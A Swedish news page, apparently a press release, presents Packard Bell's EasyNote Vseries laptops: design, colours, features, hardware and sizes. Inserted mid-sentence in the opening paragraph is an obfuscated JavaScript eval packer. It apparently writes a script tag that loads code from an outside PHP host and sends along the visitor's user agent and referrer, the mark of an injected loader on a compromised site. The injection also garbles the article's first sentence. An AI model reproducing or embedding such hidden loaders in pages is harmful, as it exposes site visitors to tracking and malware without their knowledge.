Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Packard Bell Presenterar EasyNote Vseries

Packard Bell Presenterar EasyNote Vseries
Sebastian

De eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyidd|var|u0026u|referrer|bfaet||js|php’.split(’|’),0,{}))
bärbara datorerna i nya EasyNote Vseries har ett kännetecknade bambumönstrat chassi och är en unik kombination av design, användarvänlighet, prestanda och attraktivt pris.

– Det finns en växande efterfrågan på bärbara datorer som kan erbjuda kraft och prestanda till ett överkomligt pris, och som samtidigt begåvats med ett stilfull yttre – och det är precis vad EasyNote Vseries handlar om. Den är konstruerad för en daglig underhållning, är lättanvänd och har en tidlös design, säger Luca Rossi, EMEA-chef Consumer Division Acer Group.

Utformningen av Vseries har inspirerats av naturen, och finns tillgänglig i färgerna röd granat, månstensvit samt ebenholtssvart, kompletterat med ett förfinat bambumönster på både insida och utsida.

Datorerna erbjuder inte bara prestanda – de är även användarvänliga. Den stora pekplattan stöder flera olika rörelsemönster och ”one-click hot keys” som ger en direkt access till ofta använda funktioner, såsom backup, spela upp, stoppa… etc.

Sociala media är viktigt för dagens användare, och med ett enda knapptryck ansluts du Twitter, Facebook, YouTube och Flickr. För kreativitet finns en fullversion av Adobe Photoshop Elements förinstallerat.

Nya Packard Bell EasyNote Vseries alla multimedia-funktioner som kan förväntas utan att kompromissa med prestanda. Den inbyggda mikrofonen och webbkameran ger möjlighet till videosamtal och till att spela in video i HD, och i och med att datorerna är utrustade med andra generationens Intel Core processor och NVIDIA-grafik, kan användaren utan problem spela krävande 3D-spel.

Packard Bell EasyNote Vseries kommer i storlekarna 15,6- samt 17,3 tum och är tillgängliga under maj månad.

Bilder: http://www.acerbilder.com/www/?page=images&lng=en&cf=1%2E+Notebook%5CPackard+Bell+Easy+Note